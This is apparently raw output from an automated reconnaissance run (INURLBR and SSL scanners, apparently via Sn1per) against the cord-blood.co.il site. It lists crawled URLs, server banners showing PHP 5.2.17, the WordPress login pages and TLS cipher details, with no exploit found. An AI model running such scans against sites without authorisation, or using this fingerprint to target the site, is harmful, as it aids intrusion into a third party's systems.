1332. |_[ + ] [ 24 / 74 ]-[00:27:02] [ - ]
1333. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=מחלות ]
1334. |_[ + ] Exploit::
1335. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1336. |_[ + ] More details:: / - / , ISP:
1337. |_[ + ] Found:: UNIDENTIFIED
1338.  
1339. _[ - ]::--------------------------------------------------------------------------------------------------------------
1340. |_[ + ] [ 25 / 74 ]-[00:27:06] [ - ]
1341. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=אנמיה ]
1342. |_[ + ] Exploit::
1343. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1344. |_[ + ] More details:: / - / , ISP:
1345. |_[ + ] Found:: UNIDENTIFIED
1346.  
1347. _[ - ]::--------------------------------------------------------------------------------------------------------------
1348. |_[ + ] [ 26 / 74 ]-[00:27:09] [ - ]
1349. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=רפואה ]
1350. |_[ + ] Exploit::
1351. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1352. |_[ + ] More details:: / - / , ISP:
1353. |_[ + ] Found:: UNIDENTIFIED
1354.  
1355. _[ - ]::--------------------------------------------------------------------------------------------------------------
1356. |_[ + ] [ 27 / 74 ]-[00:27:13] [ - ]
1357. |_[ + ] Target:: [ http://www.cord-blood.co.il/?cat=5 ]
1358. |_[ + ] Exploit::
1359. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1360. |_[ + ] More details:: / - / , ISP:
1361. |_[ + ] Found:: UNIDENTIFIED
1362.  
1363. _[ - ]::--------------------------------------------------------------------------------------------------------------
1364. |_[ + ] [ 28 / 74 ]-[00:27:18] [ - ]
1365. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=לוקמיה ]
1366. |_[ + ] Exploit::
1367. |_[ + ] Information Server:: , , IP::0
1368. |_[ + ] More details::
1369. |_[ + ] Found:: UNIDENTIFIED
1370. |_[ + ] ERROR CONECTION:: Resolving timed out after 5000 milliseconds
1371.  
1372. _[ - ]::--------------------------------------------------------------------------------------------------------------
1373. |_[ + ] [ 29 / 74 ]-[00:27:23] [ - ]
1374. |_[ + ] Target:: [ http://www.cord-blood.co.il/?cat=93 ]
1375. |_[ + ] Exploit::
1376. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1377. |_[ + ] More details:: / - / , ISP:
1378. |_[ + ] Found:: UNIDENTIFIED
1379.  
1380. _[ - ]::--------------------------------------------------------------------------------------------------------------
1381. |_[ + ] [ 30 / 74 ]-[00:27:27] [ - ]
1382. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=בריאות ]
1383. |_[ + ] Exploit::
1384. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1385. |_[ + ] More details:: / - / , ISP:
1386. |_[ + ] Found:: UNIDENTIFIED
1387.  
1388. _[ - ]::--------------------------------------------------------------------------------------------------------------
1389. |_[ + ] [ 31 / 74 ]-[00:27:31] [ - ]
1390. |_[ + ] Target:: [ http://www.cord-blood.co.il/?cat=23 ]
1391. |_[ + ] Exploit::
1392. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1393. |_[ + ] More details:: / - / , ISP:
1394. |_[ + ] Found:: UNIDENTIFIED
1395.  
1396. _[ - ]::--------------------------------------------------------------------------------------------------------------
1397. |_[ + ] [ 32 / 74 ]-[00:27:36] [ - ]
1398. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=ביוקורד ]
1399. |_[ + ] Exploit::
1400. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: nginx , IP:80.179.142.111:80
1401. |_[ + ] More details:: / - / , ISP:
1402. |_[ + ] Found:: UNIDENTIFIED
1403.  
1404. _[ - ]::--------------------------------------------------------------------------------------------------------------
1405. |_[ + ] [ 33 / 74 ]-[00:27:41] [ - ]
1406. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=השתלה ]
1407. |_[ + ] Exploit::
1408. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1409. |_[ + ] More details:: / - / , ISP:
1410. |_[ + ] Found:: UNIDENTIFIED
1411.  
1412. _[ - ]::--------------------------------------------------------------------------------------------------------------
1413. |_[ + ] [ 34 / 74 ]-[00:27:45] [ - ]
1414. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=קנולציה ]
1415. |_[ + ] Exploit::
1416. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1417. |_[ + ] More details:: / - / , ISP:
1418. |_[ + ] Found:: UNIDENTIFIED
1419.  
1420. _[ - ]::--------------------------------------------------------------------------------------------------------------
1421. |_[ + ] [ 35 / 74 ]-[00:27:50] [ - ]
1422. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=שליה ]
1423. |_[ + ] Exploit::
1424. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1425. |_[ + ] More details:: / - / , ISP:
1426. |_[ + ] Found:: UNIDENTIFIED
1427.  
1428. _[ - ]::--------------------------------------------------------------------------------------------------------------
1429. |_[ + ] [ 36 / 74 ]-[00:27:53] [ - ]
1430. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=תינוק ]
1431. |_[ + ] Exploit::
1432. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1433. |_[ + ] More details:: / - / , ISP:
1434. |_[ + ] Found:: UNIDENTIFIED
1435.  
1436. _[ - ]::--------------------------------------------------------------------------------------------------------------
1437. |_[ + ] [ 37 / 74 ]-[00:27:57] [ - ]
1438. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=הורים ]
1439. |_[ + ] Exploit::
1440. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1441. |_[ + ] More details:: / - / , ISP:
1442. |_[ + ] Found:: UNIDENTIFIED
1443.  
1444. _[ - ]::--------------------------------------------------------------------------------------------------------------
1445. |_[ + ] [ 38 / 74 ]-[00:28:01] [ - ]
1446. |_[ + ] Target:: [ http://www.cord-blood.co.il/?cat=36 ]
1447. |_[ + ] Exploit::
1448. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1449. |_[ + ] More details:: / - / , ISP:
1450. |_[ + ] Found:: UNIDENTIFIED
1451.  
1452. _[ - ]::--------------------------------------------------------------------------------------------------------------
1453. |_[ + ] [ 39 / 74 ]-[00:28:04] [ - ]
1454. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=סוכרת ]
1455. |_[ + ] Exploit::
1456. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1457. |_[ + ] More details:: / - / , ISP:
1458. |_[ + ] Found:: UNIDENTIFIED
1459.  
1460. _[ - ]::--------------------------------------------------------------------------------------------------------------
1461. |_[ + ] [ 40 / 74 ]-[00:28:08] [ - ]
1462. |_[ + ] Target:: [ http://www.cord-blood.co.il/?cat=105 ]
1463. |_[ + ] Exploit::
1464. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1465. |_[ + ] More details:: / - / , ISP:
1466. |_[ + ] Found:: UNIDENTIFIED
1467.  
1468. _[ - ]::--------------------------------------------------------------------------------------------------------------
1469. |_[ + ] [ 41 / 74 ]-[00:28:12] [ - ]
1470. |_[ + ] Target:: [ http://www.cord-blood.co.il/?page_id=9 ]
1471. |_[ + ] Exploit::
1472. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1473. |_[ + ] More details:: / - / , ISP:
1474. |_[ + ] Found:: UNIDENTIFIED
1475.  
1476. _[ - ]::--------------------------------------------------------------------------------------------------------------
1477. |_[ + ] [ 42 / 74 ]-[00:28:16] [ - ]
1478. |_[ + ] Target:: [ http://www.cord-blood.co.il/?cat=48 ]
1479. |_[ + ] Exploit::
1480. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1481. |_[ + ] More details:: / - / , ISP:
1482. |_[ + ] Found:: UNIDENTIFIED
1483.  
1484. _[ - ]::--------------------------------------------------------------------------------------------------------------
1485. |_[ + ] [ 43 / 74 ]-[00:28:19] [ - ]
1486. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=פרקינסון ]
1487. |_[ + ] Exploit::
1488. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1489. |_[ + ] More details:: / - / , ISP:
1490. |_[ + ] Found:: UNIDENTIFIED
1491.  
1492. _[ - ]::--------------------------------------------------------------------------------------------------------------
1493. |_[ + ] [ 44 / 74 ]-[00:28:23] [ - ]
1494. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=טיפול ]
1495. |_[ + ] Exploit::
1496. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1497. |_[ + ] More details:: / - / , ISP:
1498. |_[ + ] Found:: UNIDENTIFIED
1499.  
1500. _[ - ]::--------------------------------------------------------------------------------------------------------------
1501. |_[ + ] [ 45 / 74 ]-[00:28:26] [ - ]
1502. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=דם-טבורי ]
1503. |_[ + ] Exploit::
1504. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: nginx , IP:80.179.142.111:80
1505. |_[ + ] More details:: / - / , ISP:
1506. |_[ + ] Found:: UNIDENTIFIED
1507.  
1508. _[ - ]::--------------------------------------------------------------------------------------------------------------
1509. |_[ + ] [ 46 / 74 ]-[00:28:30] [ - ]
1510. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=חבל-הטבור ]
1511. |_[ + ] Exploit::
1512. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1513. |_[ + ] More details:: / - / , ISP:
1514. |_[ + ] Found:: UNIDENTIFIED
1515.  
1516. _[ - ]::--------------------------------------------------------------------------------------------------------------
1517. |_[ + ] [ 47 / 74 ]-[00:28:34] [ - ]
1518. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=חדר-לידה ]
1519. |_[ + ] Exploit::
1520. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1521. |_[ + ] More details:: / - / , ISP:
1522. |_[ + ] Found:: UNIDENTIFIED
1523.  
1524. _[ - ]::--------------------------------------------------------------------------------------------------------------
1525. |_[ + ] [ 48 / 74 ]-[00:28:38] [ - ]
1526. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=מוח-עצם ]
1527. |_[ + ] Exploit::
1528. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1529. |_[ + ] More details:: / - / , ISP:
1530. |_[ + ] Found:: UNIDENTIFIED
1531.  
1532. _[ - ]::--------------------------------------------------------------------------------------------------------------
1533. |_[ + ] [ 49 / 74 ]-[00:28:42] [ - ]
1534. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=שיתוק-מוחין ]
1535. |_[ + ] Exploit::
1536. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1537. |_[ + ] More details:: / - / , ISP:
1538. |_[ + ] Found:: UNIDENTIFIED
1539.  
1540. _[ - ]::--------------------------------------------------------------------------------------------------------------
1541. |_[ + ] [ 50 / 74 ]-[00:28:46] [ - ]
1542. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=הקפאת-תאים ]
1543. |_[ + ] Exploit::
1544. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1545. |_[ + ] More details:: / - / , ISP:
1546. |_[ + ] Found:: UNIDENTIFIED
1547.  
1548. _[ - ]::--------------------------------------------------------------------------------------------------------------
1549. |_[ + ] [ 51 / 74 ]-[00:28:50] [ - ]
1550. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=מח-עצם ]
1551. |_[ + ] Exploit::
1552. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1553. |_[ + ] More details:: / - / , ISP:
1554. |_[ + ] Found:: UNIDENTIFIED
1555.  
1556. _[ - ]::--------------------------------------------------------------------------------------------------------------
1557. |_[ + ] [ 52 / 74 ]-[00:28:54] [ - ]
1558. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=ביטוח-בריאות ]
1559. |_[ + ] Exploit::
1560. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1561. |_[ + ] More details:: / - / , ISP:
1562. |_[ + ] Found:: UNIDENTIFIED
1563.  
1564. _[ - ]::--------------------------------------------------------------------------------------------------------------
1565. |_[ + ] [ 53 / 74 ]-[00:28:58] [ - ]
1566. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=סרטן-הלימפה ]
1567. |_[ + ] Exploit::
1568. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1569. |_[ + ] More details:: / - / , ISP:
1570. |_[ + ] Found:: UNIDENTIFIED
1571.  
1572. _[ - ]::--------------------------------------------------------------------------------------------------------------
1573. |_[ + ] [ 54 / 74 ]-[00:29:02] [ - ]
1574. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=בנק-הדם ]
1575. |_[ + ] Exploit::
1576. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1577. |_[ + ] More details:: / - / , ISP:
1578. |_[ + ] Found:: UNIDENTIFIED
1579.  
1580. _[ - ]::--------------------------------------------------------------------------------------------------------------
1581. |_[ + ] [ 55 / 74 ]-[00:29:06] [ - ]
1582. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=תאי-אב ]
1583. |_[ + ] Exploit::
1584. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1585. |_[ + ] More details:: / - / , ISP:
1586. |_[ + ] Found:: UNIDENTIFIED
1587.  
1588. _[ - ]::--------------------------------------------------------------------------------------------------------------
1589. |_[ + ] [ 56 / 74 ]-[00:29:09] [ - ]
1590. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=מחלות-גנטיות ]
1591. |_[ + ] Exploit::
1592. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1593. |_[ + ] More details:: / - / , ISP:
1594. |_[ + ] Found:: UNIDENTIFIED
1595.  
1596. _[ - ]::--------------------------------------------------------------------------------------------------------------
1597. |_[ + ] [ 57 / 74 ]-[00:29:13] [ - ]
1598. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=תרומת-דם ]
1599. |_[ + ] Exploit::
1600. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1601. |_[ + ] More details:: / - / , ISP:
1602. |_[ + ] Found:: UNIDENTIFIED
1603.  
1604. _[ - ]::--------------------------------------------------------------------------------------------------------------
1605. |_[ + ] [ 58 / 74 ]-[00:29:18] [ - ]
1606. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=מערכת-החיסון ]
1607. |_[ + ] Exploit::
1608. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1609. |_[ + ] More details:: / - / , ISP:
1610. |_[ + ] Found:: UNIDENTIFIED
1611.  
1612. _[ - ]::--------------------------------------------------------------------------------------------------------------
1613. |_[ + ] [ 59 / 74 ]-[00:29:22] [ - ]
1614. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=תאי-דם ]
1615. |_[ + ] Exploit::
1616. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1617. |_[ + ] More details:: / - / , ISP:
1618. |_[ + ] Found:: UNIDENTIFIED
1619.  
1620. _[ - ]::--------------------------------------------------------------------------------------------------------------
1621. |_[ + ] [ 60 / 74 ]-[00:29:26] [ - ]
1622. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=סרטן-השד ]
1623. |_[ + ] Exploit::
1624. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1625. |_[ + ] More details:: / - / , ISP:
1626. |_[ + ] Found:: UNIDENTIFIED
1627.  
1628. _[ - ]::--------------------------------------------------------------------------------------------------------------
1629. |_[ + ] [ 61 / 74 ]-[00:29:30] [ - ]
1630. |_[ + ] Target:: [ http://www.cord-blood.co.il/?p=15&cpage=1 ]
1631. |_[ + ] Exploit::
1632. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1633. |_[ + ] More details:: / - / , ISP:
1634. |_[ + ] Found:: UNIDENTIFIED
1635.  
1636. _[ - ]::--------------------------------------------------------------------------------------------------------------
1637. |_[ + ] [ 62 / 74 ]-[00:29:34] [ - ]
1638. |_[ + ] Target:: [ http://www.cord-blood.co.il/?p=25&cpage=1 ]
1639. |_[ + ] Exploit::
1640. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1641. |_[ + ] More details:: / - / , ISP:
1642. |_[ + ] Found:: UNIDENTIFIED
1643.  
1644. _[ - ]::--------------------------------------------------------------------------------------------------------------
1645. |_[ + ] [ 63 / 74 ]-[00:29:38] [ - ]
1646. |_[ + ] Target:: [ http://www.cord-blood.co.il/?p=30&cpage=1 ]
1647. |_[ + ] Exploit::
1648. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1649. |_[ + ] More details:: / - / , ISP:
1650. |_[ + ] Found:: UNIDENTIFIED
1651.  
1652. _[ - ]::--------------------------------------------------------------------------------------------------------------
1653. |_[ + ] [ 64 / 74 ]-[00:29:42] [ - ]
1654. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=איסוף-דם-טבורי ]
1655. |_[ + ] Exploit::
1656. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1657. |_[ + ] More details:: / - / , ISP:
1658. |_[ + ] Found:: UNIDENTIFIED
1659.  
1660. _[ - ]::--------------------------------------------------------------------------------------------------------------
1661. |_[ + ] [ 65 / 74 ]-[00:29:46] [ - ]
1662. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=בנק-דם-טבורי ]
1663. |_[ + ] Exploit::
1664. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1665. |_[ + ] More details:: / - / , ISP:
1666. |_[ + ] Found:: UNIDENTIFIED
1667.  
1668. _[ - ]::--------------------------------------------------------------------------------------------------------------
1669. |_[ + ] [ 66 / 74 ]-[00:29:50] [ - ]
1670. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=השתלת-מוח-עצם ]
1671. |_[ + ] Exploit::
1672. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1673. |_[ + ] More details:: / - / , ISP:
1674. |_[ + ] Found:: UNIDENTIFIED
1675.  
1676. _[ - ]::--------------------------------------------------------------------------------------------------------------
1677. |_[ + ] [ 67 / 74 ]-[00:29:54] [ - ]
1678. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=בנק-דם-ציבורי ]
1679. |_[ + ] Exploit::
1680. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1681. |_[ + ] More details:: / - / , ISP:
1682. |_[ + ] Found:: UNIDENTIFIED
1683.  
1684. _[ - ]::--------------------------------------------------------------------------------------------------------------
1685. |_[ + ] [ 68 / 74 ]-[00:29:58] [ - ]
1686. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=שימור-דם-טבורי ]
1687. |_[ + ] Exploit::
1688. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1689. |_[ + ] More details:: / - / , ISP:
1690. |_[ + ] Found:: UNIDENTIFIED
1691.  
1692. _[ - ]::--------------------------------------------------------------------------------------------------------------
1693. |_[ + ] [ 69 / 74 ]-[00:30:01] [ - ]
1694. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=הפריה-חוץ-גופית ]
1695. |_[ + ] Exploit::
1696. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1697. |_[ + ] More details:: / - / , ISP:
1698. |_[ + ] Found:: UNIDENTIFIED
1699.  
1700. _[ - ]::--------------------------------------------------------------------------------------------------------------
1701. |_[ + ] [ 70 / 74 ]-[00:30:05] [ - ]
1702. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=דם-חבל-הטבור ]
1703. |_[ + ] Exploit::
1704. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1705. |_[ + ] More details:: / - / , ISP:
1706. |_[ + ] Found:: UNIDENTIFIED
1707.  
1708. _[ - ]::--------------------------------------------------------------------------------------------------------------
1709. |_[ + ] [ 71 / 74 ]-[00:30:10] [ - ]
1710. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=חומר-שימור-ביולוגי ]
1711. |_[ + ] Exploit::
1712. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1713. |_[ + ] More details:: / - / , ISP:
1714. |_[ + ] Found:: UNIDENTIFIED
1715.  
1716. _[ - ]::--------------------------------------------------------------------------------------------------------------
1717. |_[ + ] [ 72 / 74 ]-[00:30:13] [ - ]
1718. |_[ + ] Target:: [ http://www.cord-blood.co.il/wp-login.php ]
1719. |_[ + ] Exploit::
1720. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1721. |_[ + ] More details:: / - / , ISP:
1722. |_[ + ] Found:: UNIDENTIFIED
1723.  
1724. _[ - ]::--------------------------------------------------------------------------------------------------------------
1725. |_[ + ] [ 73 / 74 ]-[00:30:16] [ - ]
1726. |_[ + ] Target:: [ http://www.cord-blood.co.il/wp-login.php?action=lostpassword ]
1727. |_[ + ] Exploit::
1728. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
1729. |_[ + ] More details:: / - / , ISP:
1730. |_[ + ] Found:: UNIDENTIFIED
1731.  
1732. [ INFO ] [ Shutting down ]
1733. [ INFO ] [ End of process INURLBR at [23-03-2018 00:30:16]
1734. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
1735. [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-cord-blood.co.il.txt ]
1736. |_________________________________________________________________________________________
1737. #######################################################################################################################################
1738.  
1739.  
1740.  
1741. AVAILABLE PLUGINS
1742. -----------------
1743.  
1744. PluginHeartbleed
1745. PluginCompression
1746. PluginSessionResumption
1747. PluginChromeSha1Deprecation
1748. PluginHSTS
1749. PluginSessionRenegotiation
1750. PluginOpenSSLCipherSuites
1751. PluginCertInfo
1752.  
1753.  
1754.  
1755. CHECKING HOST(S) AVAILABILITY
1756. ------------------------------------------------------------------------------------------------------------------------------------
1757.  
1758. cord-blood.co.il:443 => 80.179.142.111:443
1759.  
1760.  
1761.  
1762. SCAN RESULTS FOR CORD-BLOOD.CO.IL:443 - 80.179.142.111:443
1763. -------------------------------------------------------------------------------------------------------------------------------------
1764.  
1765. * Deflate Compression:
1766. OK - Compression disabled
1767.  
1768. * Session Renegotiation:
1769. Client-initiated Renegotiations: OK - Rejected
1770. Secure Renegotiation: OK - Supported
1771.  
1772. * Certificate - Content:
1773. SHA1 Fingerprint: f06c27af6a2bb1913392b7926445a9259d73731e
1774. Common Name: localhost
1775. Issuer: localhost
1776. Serial Number: C9C86319C823F93B
1777. Not Before: Mar 8 07:53:03 2016 GMT
1778. Not After: Jul 24 07:53:03 2043 GMT
1779. Signature Algorithm: sha1WithRSAEncryption
1780. Public Key Algorithm: rsaEncryption
1781. Key Size: 2048 bit
1782. Exponent: 65537 (0x10001)
1783.  
1784. * Certificate - Trust:
1785. Hostname Validation: FAILED - Certificate does NOT match cord-blood.co.il
1786. Google CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
1787. Java 6 CA Store (Update 65): FAILED - Certificate is NOT Trusted: self signed certificate
1788. Microsoft CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
1789. Apple CA Store (OS X 10.10.5): FAILED - Certificate is NOT Trusted: self signed certificate
1790. Mozilla NSS CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
1791. Certificate Chain Received: ['localhost', 'COMODO High-Assurance Secure Server CA', 'AddTrust External CA Root', 'GlobalSign Root CA', 'thawte Primary Root CA', 'VeriSign Class 3 Secure Server CA - G3', 'VeriSign Class 3 Public Primary Certification Authority - G5']
1792.  
1793. * Certificate - OCSP Stapling:
1794. NOT SUPPORTED - Server did not send back an OCSP response.
1795.  
1796. * Session Resumption:
1797. With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
1798. With TLS Session Tickets: OK - Supported
1799.  
1800. * SSLV2 Cipher Suites:
1801. Server rejected all cipher suites.
1802.  
1803. * SSLV3 Cipher Suites:
1804. Server rejected all cipher suites.
1805.  
1806.  
1807.  
1808. SCAN COMPLETED IN 19.08 S
1809. -------------------------
1810. Version: 1.11.11-static
1811. OpenSSL 1.0.2-chacha (1.0.2g-dev)
1812.  
1813. Connected to 80.179.142.111
1814.  
1815. Testing SSL server cord-blood.co.il on port 443 using SNI name cord-blood.co.il
1816.  
1817. TLS Fallback SCSV:
1818. Server supports TLS Fallback SCSV
1819.  
1820. TLS renegotiation:
1821. Secure session renegotiation supported
1822.  
1823. TLS Compression:
1824. Compression disabled
1825.  
1826. Heartbleed:
1827. TLS 1.2 not vulnerable to heartbleed
1828. TLS 1.1 not vulnerable to heartbleed
1829. TLS 1.0 not vulnerable to heartbleed
1830.  
1831. Supported Server Cipher(s):
1832. Preferred TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
1833. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
1834. Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
1835. Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
1836. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
1837. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
1838. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
1839. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
1840. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
1841. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
1842. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
1843. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
1844. Accepted TLSv1.2 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
1845. Accepted TLSv1.2 128 bits AES128-GCM-SHA256
1846. Accepted TLSv1.2 256 bits AES256-GCM-SHA384
1847. Accepted TLSv1.2 128 bits AES128-SHA256
1848. Accepted TLSv1.2 256 bits AES256-SHA256
1849. Accepted TLSv1.2 128 bits AES128-SHA
1850. Accepted TLSv1.2 256 bits AES256-SHA
1851. Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
1852. Accepted TLSv1.2 256 bits CAMELLIA256-SHA
1853. Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
1854. Accepted TLSv1.2 128 bits CAMELLIA128-SHA
1855. Accepted TLSv1.2 112 bits DES-CBC3-SHA
